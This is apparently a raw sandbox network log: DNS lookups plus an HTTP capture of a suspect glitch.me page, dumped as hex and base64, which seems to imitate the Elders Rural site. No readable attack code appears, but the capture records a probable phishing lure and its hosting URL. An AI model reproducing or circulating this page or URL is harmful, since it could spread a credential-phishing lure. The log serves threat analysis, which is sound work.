                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.72.201.156A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.246.210.167A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.60.57A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.77.215.91A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com99.80.128.0A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.49.181.118A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.240.80.56A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779943943 CET1.1.1.1192.168.2.40x3bcNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.135.186A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779954910 CET1.1.1.1192.168.2.40xb376No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779954910 CET1.1.1.1192.168.2.40xb376No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779954910 CET1.1.1.1192.168.2.40xb376No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779963017 CET1.1.1.1192.168.2.40xe822No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779966116 CET1.1.1.1192.168.2.40x18e8No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.779966116 CET1.1.1.1192.168.2.40x18e8No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.780677080 CET1.1.1.1192.168.2.40x5654No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.780687094 CET1.1.1.1192.168.2.40x3049No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789913893 CET1.1.1.1192.168.2.40x1974No error (0)eldersrural.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789913893 CET1.1.1.1192.168.2.40x1974No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789913893 CET1.1.1.1192.168.2.40x1974No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)eldersrural.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.133.195A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.49.53.196A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com99.80.128.0A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.251.39.134A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.141.218A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.254.36.163A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.194.45.227A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.789983988 CET1.1.1.1192.168.2.40xdae7No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.135.186A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.940798998 CET1.1.1.1192.168.2.40x17a6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.940798998 CET1.1.1.1192.168.2.40x17a6No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:25.940798998 CET1.1.1.1192.168.2.40x17a6No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.214437008 CET1.1.1.1192.168.2.40xc426No error (0)eldersrural.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.214437008 CET1.1.1.1192.168.2.40xc426No error (0)eldersrural.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.214437008 CET1.1.1.1192.168.2.40xc426No error (0)eldersrural.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.517478943 CET1.1.1.1192.168.2.40x922No error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.517492056 CET1.1.1.1192.168.2.40xc8f6No error (0)cdn.mouseflow.comcdn.mouseflow.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.719716072 CET1.1.1.1192.168.2.40x9fb1No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.719716072 CET1.1.1.1192.168.2.40x9fb1No error (0)star-mini.c10r.facebook.com157.240.251.35A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:27.720838070 CET1.1.1.1192.168.2.40x84e3No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:29.029382944 CET1.1.1.1192.168.2.40x46b3No error (0)eldersrural.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:29.029382944 CET1.1.1.1192.168.2.40x46b3No error (0)eldersrural.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:29.029382944 CET1.1.1.1192.168.2.40x46b3No error (0)eldersrural.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.625557899 CET1.1.1.1192.168.2.40x4f0cNo error (0)yourir.info45.76.112.20A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.625557899 CET1.1.1.1192.168.2.40x4f0cNo error (0)yourir.info103.1.185.157A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.655669928 CET1.1.1.1192.168.2.40xaa02No error (0)apimprd.ext.elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.655669928 CET1.1.1.1192.168.2.40xaa02No error (0)apimprd.ext.elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.658899069 CET1.1.1.1192.168.2.40x2412No error (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.742779970 CET1.1.1.1192.168.2.40x8c27No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:31.742791891 CET1.1.1.1192.168.2.40x2bc6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:33.472193956 CET1.1.1.1192.168.2.40x50bNo error (0)yourir.info103.1.185.157A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:33.472193956 CET1.1.1.1192.168.2.40x50bNo error (0)yourir.info45.76.112.20A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:35.235266924 CET1.1.1.1192.168.2.40xb2d3No error (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:35.785094976 CET1.1.1.1192.168.2.40x4129No error (0)apimprd.ext.elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:35.785094976 CET1.1.1.1192.168.2.40x4129No error (0)apimprd.ext.elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:36.069236040 CET1.1.1.1192.168.2.40xf441No error (0)apimprd.ext.elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                    Nov 5, 2024 09:03:36.069236040 CET1.1.1.1192.168.2.40xf441No error (0)apimprd.ext.elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.44973554.81.94.164435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:02:15 UTC679OUTGET / HTTP/1.1
                                                                                                                                    Host: astonishing-maize-sunstone.glitch.me
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:02:16 UTC509INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:02:16 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Content-Length: 1379538
                                                                                                                                    Connection: close
                                                                                                                                    x-amz-id-2: +K29y+jjcFy7uRrNdS516d/V0jbSq3nh05fCiQ3YaTzTQ9hMKo+cZgumFQ6epcy83fGIOZ4/KBY=
                                                                                                                                    x-amz-request-id: 34WHZMZ0VEP0VV1K
                                                                                                                                    last-modified: Tue, 05 Nov 2024 04:03:07 GMT
                                                                                                                                    etag: "834f48dcd027b791fc4978a00f1dd91e"
                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                    cache-control: no-cache
                                                                                                                                    x-amz-version-id: G6adVcORL.QoFj0gvtNtggrxSvvpKuHn
                                                                                                                                    accept-ranges: bytes
                                                                                                                                    server: AmazonS3
                                                                                                                                    2024-11-05 08:02:16 UTC15875INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 20 69 64 3d 22 70 61 67 65 54 69 74 74 6c 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 69 64 3d 22 66 61 76 69 63 6f 6e 50 61 67 65 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20
                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title id="pageTittle"></title> <link id="faviconPage" rel="shortcut icon" href="" type="image/x-icon">
                                                                                                                                    2024-11-05 08:02:16 UTC509INData Raw: 52 69 49 2b 4e 51 4c 36 34 53 4d 54 46 65 4a 39 4e 45 47 43 67 69 79 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 69 52 41 41 6f 4a 41 78 74 5a 31 79 4c 70 77 45 52 6d 46 43 69 4f 39 54 41 58 46 4a 4f 62 6f 51 55 53 66 50 34 66 49 67 67 6d 49 72 74 4f 45 6e 4c 78 45 49 48 58 37 4a 71 52 64 4f 49 65 73 49 6c 63 42 52 59 72 6c 57 44 31 37 47 70 46 6e 54 79 47 32 59 47 48 45 31 57 72 67 70 5a 5a 6f 68 67 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 53 43 68 34 41 49 2f 59 57 49 44 43 45 41 67 78 63 46 59 46 4c 77 64 54 45 35 45 35 65 53 73 79 41 73 42 33 57 4b 46 4e 71 76 41 76 6b 69 6b 5a
                                                                                                                                    Data Ascii: RiI+NQL64SMTFeJ9NEGCgiyRAAiRAAiRAAiRAAiRAAiRAAiRAAiRAAiRAAiRAAiRAAiRAAiRAAiRAAoJAxtZ1yLpwERmFCiO9TAXFJOboQUSfP4fIggmIrtOEnLxEIHX7JqRdOIesIlcBRYrlWD17GpFnTyG2YGHE1WrgpZZohgRIgARIgARIgARIgARIgARIgARIgARIgARIgASCh4AI/YWIDCEAgxcFYFLwdTE5E5eSsyAsB3WKFNqvAvkikZ
                                                                                                                                    2024-11-05 08:02:16 UTC515INData Raw: 76 6b 4b 4c 57 6e 51 55 55 44 67 68 43 6f 58 79 69 34 30 51 53 78 63 76 58 73 53 5a 30 32 64 45 6c 4c 61 4d 45 4f 73 5a 75 2b 4d 4e 41 6a 48 52 30 53 68 61 72 43 67 53 45 68 4b 38 59 59 34 32 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 49 41 45 53 43 41 6f 43 47 53 66 4f 49 71 30 2f 58 75 51 55 72 30 4f 6f 6f 34 66 52 73 54 4b 42 55 68 66 73 77 78 5a 71 39 63 70 2f 79 4f 76 62 59 4b 59 70 69 32 51 66 58 31 62 5a 4a 59 71 68 2f 68 64 57 78 46 62 71 53 6f 69 53 70 51 4a 69 76 36 5a 79 55 6b 70 2f 72 6f 73 2f 6d 64 58 71 51 55 49 30 56 66 32 6b 74 2b 52 76 58 59 4a 63 48 68 2f 6a 70 76 6c 4b 69 48 69 6d 6c 61 49 61 48 57 4c 2b 4f 47 2b 4b 43 4c 32 62 6b 64 2b 49 51 43
                                                                                                                                    Data Ascii: vkKLWnQUUDghCoXyi40QSxcvXsSZ02dElLaMEOsZu+MNAjHR0SharCgSEhK8YY42SIAESIAESIAESIAESIAESIAESIAESIAESIAESIAESIAESIAESCAoCGSfOIq0/XuQUr0Ooo4fRsTKBUhfswxZq9cp/yOvbYKYpi2QfX1bZJYqh/hdWxFbqSoiSpQJiv6ZyUkp/ros/mdXqQUI0Vf2kt+RvXYJcHh/jpvlKiHimlaIaHWL+OG+KCL2bkd+IQC
                                                                                                                                    2024-11-05 08:02:16 UTC16384INData Raw: 35 64 49 58 64 67 6c 45 74 6d 79 47 2b 79 37 31 49 75 66 72 61 48 4e 62 58 33 57 43 33 48 44 4e 4a 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 67 41 52 49 49 48 77 49 5a 49 74 41 31 66 4b 2f 36 4c 46 38 46 53 38 69 59 4c 58 38 4b 7a 50 55 71 7a 77 65 6f 54 4c 6c 76 6b 33 4b 4b 61 49 56 46 51 64 46 74 47 75 74 76 44 53 71 62 49 6c 73 56 55 37 73 57 4e 72 51 44 6b 68 37 56 2b 79 4b 46 36 30 59 32 79 66 2f 4b 32 66 44 66 2b 65 54 64 70 37 49 55 30 5a 4c 36 6f 51 52 4f 39 6f 72 7a 37 2f 2f 65 50 48 39 70 2f 50 7a 52 78 51 54 6e 32 2f 2f 66 65 35 70 4a 78 64 66 53 53 41 30 43 57 52 6c 5a 58 70 48 41 43 59 6a 66 35 30 36 46 32 4a 68 76 78 79 4d 2b 56 57 46 51 79 73 53 32 4e 36 39 2b 31 52 50 71 31 65 72 37 4b 44 48 7a 41 35 6e 41 72 74 32 35 35 77 66 56 61
                                                                                                                                    Data Ascii: 5dIXdglEtmyG+y71IufraHNbX3WC3HDNJgARIgARIgARIgARIgARIIHwIZItA1fK/6LF8FS8iYLX8KzPUqzweoTLlvk3KKaIVFQdFtGutvDSqbIlsVU7sWNrQDkh7V+yKF60Y2yf/K2fDf+eTdp7IU0ZL6oQRO9orz7//ePH9p/PzRxQTn2//fe5pJxdfSSA0CWRlZXpHACYjf506F2JhvxyM+VWFQysS2N69+1RPq1er7KDHzA5nArt255wfVa
                                                                                                                                    2024-11-05 08:02:16 UTC8949INData Raw: 5a 44 53 77 74 33 37 66 75 69 4a 75 57 37 79 30 50 62 4f 2b 54 4e 50 75 32 2b 64 35 71 7a 30 78 32 66 76 6a 68 42 7a 77 69 46 74 68 30 4a 73 44 71 63 75 63 64 57 4c 78 34 4b 62 36 65 39 69 56 75 75 65 55 57 73 57 72 36 53 74 7a 61 73 52 50 71 31 71 6f 74 6f 6a 34 73 31 74 55 64 54 51 42 57 72 46 67 78 4d 55 47 77 6a 4b 70 7a 37 4e 67 78 6e 44 78 35 43 6f 55 53 45 6a 42 6e 39 69 2b 6f 56 36 2b 65 4c 6c 73 73 52 41 49 6b 51 41 49 6b 51 41 49 6b 51 41 49 6b 34 42 6b 42 61 77 48 59 69 30 4f 48 34 50 6e 6e 6e 6e 50 62 6f 43 38 46 59 4f 2b 4f 47 6f 57 33 68 34 2b 67 41 4d 7a 74 55 54 46 65 77 65 67 7a 6b 4c 2f 72 47 65 39 68 38 4e 54 55 49 77 44 37 38 6f 75 70 61 6d 47 4f 35 73 32 61 34 34 34 37 37 7a 54 55 4f 52 6d 4a 36 38 73 76 76 6c 41 52 72 46 35 39 37 66
                                                                                                                                    Data Ascii: ZDSwt37fuiJuW7y0PbO+TNPu2+d5qz0x2fvjhBzwiFth0JsDqcucdWLx4Kb6e9iVuueUWsWr6StzasRPq1qotoj4s1tUdTQBWrFgxMUGwjKpz7NgxnDx5CoUSEjBn9i+oV6+eLlssRAIkQAIkQAIkQAIk4BkBawHYi0OH4PnnnnPboC8FYO+OGoW3h4+gAMztUTFewegzkL/rGe9h8NTUIwD78oupamGO5s2a44477zTUORmJ68svvlARrF597f
                                                                                                                                    2024-11-05 08:02:16 UTC8459INData Raw: 33 69 62 45 59 78 65 45 41 44 56 4c 51 68 5a 4a 69 73 55 53 52 56 73 56 4b 6c 54 45 30 71 57 4c 46 66 74 4b 6c 53 70 5a 50 70 4f 6b 59 47 79 35 69 4b 77 6d 55 2f 58 71 31 56 30 2b 76 38 70 49 62 48 75 46 62 32 64 4f 6e 31 5a 31 35 42 2f 70 56 2f 37 38 42 63 52 6e 61 54 6d 37 66 56 71 36 5a 4c 47 4b 57 69 62 37 58 4c 6c 79 46 55 73 39 36 34 33 46 69 78 63 71 33 36 7a 46 61 64 62 48 75 55 30 43 34 55 79 41 45 63 44 38 50 2f 71 2b 75 6f 35 72 64 69 6b 41 41 36 49 69 78 66 57 44 45 63 43 41 64 5a 73 50 75 33 32 47 53 38 6c 63 70 54 49 55 67 4c 6b 4e 54 6d 65 46 55 79 4b 53 31 6f 36 64 4f 38 58 4e 54 58 37 55 45 65 4b 76 57 42 48 75 56 47 2b 53 4e 34 48 62 74 6d 2f 48 78 6f 32 62 56 4c 6a 57 4b 70 55 72 6f 30 47 44 2b 70 41 33 66 37 35 49 38 6b 5a 4f 2b 6c 70
                                                                                                                                    Data Ascii: 3ibEYxeEADVLQhZJisUSRVsVKlTE0qWLFftKlSpZPpOkYGy5iKwmU/Xq1V0+v8pIbHuFb2dOn1Z15B/pV/78BcRnaTm7fVq6ZLGKWib7XLlyFUs9643Fixcq36zFadbHuU0C4UyAEcD8P/q+uo5rdikAA6IixfWDEcCAdZsPu32GS8lcpTIUgLkNTmeFUyKS1o6dO8XNTX7UEeKvWBHuVG+SN4Hbtm/Hxo2bVLjWKpUro0GD+pA3f75I8kZO+lp
                                                                                                                                    2024-11-05 08:02:16 UTC1024INData Raw: 57 74 46 6d 7a 51 74 39 41 34 6a 4f 6b 34 37 64 58 65 55 68 48 76 43 55 6c 44 72 77 72 31 48 2f 66 66 2f 2b 39 6f 41 36 43 79 38 76 4c 30 33 50 38 62 64 71 30 6b 59 4d 50 37 69 42 56 71 31 5a 4e 2b 72 67 75 2f 61 52 63 4b 69 4e 4a 48 34 34 33 53 59 41 45 53 49 41 45 53 49 41 45 53 43 41 6b 41 66 52 76 53 74 4a 61 79 6d 53 50 37 53 65 7a 33 57 47 48 48 56 54 66 63 55 64 70 31 4c 69 52 37 4c 58 58 33 6c 4b 75 58 4c 6c 43 30 52 54 6c 75 44 63 56 6d 55 47 68 42 79 6b 47 46 36 4c 4b 4a 45 6f 62 6e 32 4c 77 43 70 6c 46 45 76 41 6b 45 50 58 62 39 6f 79 6b 47 46 7a 30 6b 76 30 57 67 32 77 7a 69 79 53 51 55 51 4b 6c 71 62 2b 5a 54 70 42 46 32 66 39 4d 39 54 6b 77 70 35 53 33 63 57 50 2b 6c 6a 4c 4b 61 6d 45 36 33 4a 39 2f 2f 69 48 33 33 48 4e 50 30 71 68 32 32 48
                                                                                                                                    Data Ascii: WtFmzQt9A4jOk47dXeUhHvCUlDrwr1H/ff/+9oA6Cy8vL03P8bdq0kYMP7iBVq1ZN+rgu/aRcKiNJH443SYAESIAESIAESCAkAfRvStJaymSP7Sez3WGHHVTfcUdp1LiR7LXX3lKuXLlC0RTluDcVmUGhBykGF6LKJEobn2LwCplFEvAkEPXb9oykGFz0kv0Wg2wziySQUQKlqb+ZTpBF2f9M9Tkwp5S3cWP+ljLKamE63J9//iH33HNP0qh22H
                                                                                                                                    2024-11-05 08:02:16 UTC16384INData Raw: 49 69 73 6b 46 4c 39 6c 76 4d 63 6b 36 73 30 6b 43 47 53 4e 51 6d 76 71 62 55 53 45 6d 6b 38 4d 57 5a 66 38 7a 36 6e 4d 6b 2b 69 2b 6a 70 70 58 79 38 6a 63 58 71 46 6d 6c 72 52 4e 4d 69 52 36 69 2f 72 59 4c 55 65 2f 65 76 64 56 45 31 64 59 64 77 44 5a 75 33 43 53 2f 2f 2f 61 62 66 50 72 5a 5a 34 49 46 50 68 69 34 58 4e 36 6e 6a 36 2b 56 75 71 6a 70 5a 73 6f 2f 47 34 74 4d 6b 53 31 5a 38 61 35 58 45 37 57 2f 2f 66 36 62 37 30 4f 68 7a 49 38 63 4f 56 4c 66 50 2b 4b 49 49 36 52 72 31 79 4e 39 2f 66 49 47 43 52 51 33 41 73 57 39 33 76 2f 37 37 37 2b 6c 55 71 56 4b 52 61 36 51 46 50 61 39 46 78 51 55 79 49 44 2b 74 38 69 36 39 65 76 6c 75 75 75 75 6b 31 71 31 64 6f 31 54 41 45 4d 38 68 78 78 79 69 42 78 33 33 50 47 65 55 52 61 56 41 68 67 73 66 64 35 37 37 37
                                                                                                                                    Data Ascii: IiskFL9lvMck6s0kCGSNQmvqbUSEmk8MWZf8z6nMk+i+jppXy8jcXqFmlrRNMiR6i/rYLUe/evdVE1dYdwDZu3CS///abfPrZZ4IFPhi4XN6nj6+VuqjpZso/G4tMkS1Z8a5XE7W//f6b70OhzI8cOVLfP+KII6Rr1yN9/fIGCRQ3AsW93v/777+lUqVKRa6QFPa9FxQUyID+t8i69evluuuuk1q1do1TAEM8hxxyiBx33PGeURaVAhgsfd5777
                                                                                                                                    2024-11-05 08:02:16 UTC8949INData Raw: 6d 6a 46 47 63 6a 6d 56 41 6e 5a 67 36 42 39 64 73 42 54 43 7a 65 77 45 4d 73 46 32 68 33 6f 64 64 46 36 44 50 4d 46 49 5a 71 46 75 39 2b 68 38 35 6f 6d 76 58 6d 4b 45 49 31 37 4a 6c 35 79 63 54 35 2b 67 33 33 48 58 58 6e 58 70 63 55 30 58 4e 6c 66 65 39 38 71 6f 34 52 54 79 54 4a 75 59 32 48 6e 7a 67 41 56 6d 72 46 75 2f 57 72 46 6c 54 4b 2b 79 5a 65 36 6e 32 6b 31 7a 4c 69 45 6d 66 52 78 49 67 41 52 49 67 41 52 49 67 41 52 4c 49 4e 51 4c 4a 2b 6a 64 2b 65 58 58 70 6c 39 34 32 36 46 59 74 2f 36 6c 66 76 37 35 63 65 75 6c 6c 63 59 59 4d 48 6e 7a 6f 51 57 33 59 46 2b 6e 5a 4d 6a 36 58 66 72 5a 66 6e 6e 45 39 61 43 77 45 57 52 41 57 31 4a 6f 64 64 33 73 6d 72 48 76 7a 47 76 64 47 6c 63 6d 62 38 61 36 58 44 42 69 79 63 42 67 35 68 67 7a 34 2b 4f 4f 4f 6b 34
                                                                                                                                    Data Ascii: mjFGcjmVAnZg6B9dsBTCzewEMsF2h3oddF6DPMFIZqFu9+h85omvXmKEI17Jl5ycT5+g33HXXnXpcU0XNlfe98qo4RTyTJuY2HnzgAVmrFu/WrFlTK+yZe6n2k1zLiEmfRxIgARIgARIgARLINQLJ+jd+eXXpl9426FYt/6lfv75ceullcYYMHnzoQW3YF+nZMj6XfrZfnnE9aCwEWRAW1Jodd3smrHvzGvdGlcmb8a6XDBiycBg5hgz4+OOOk4
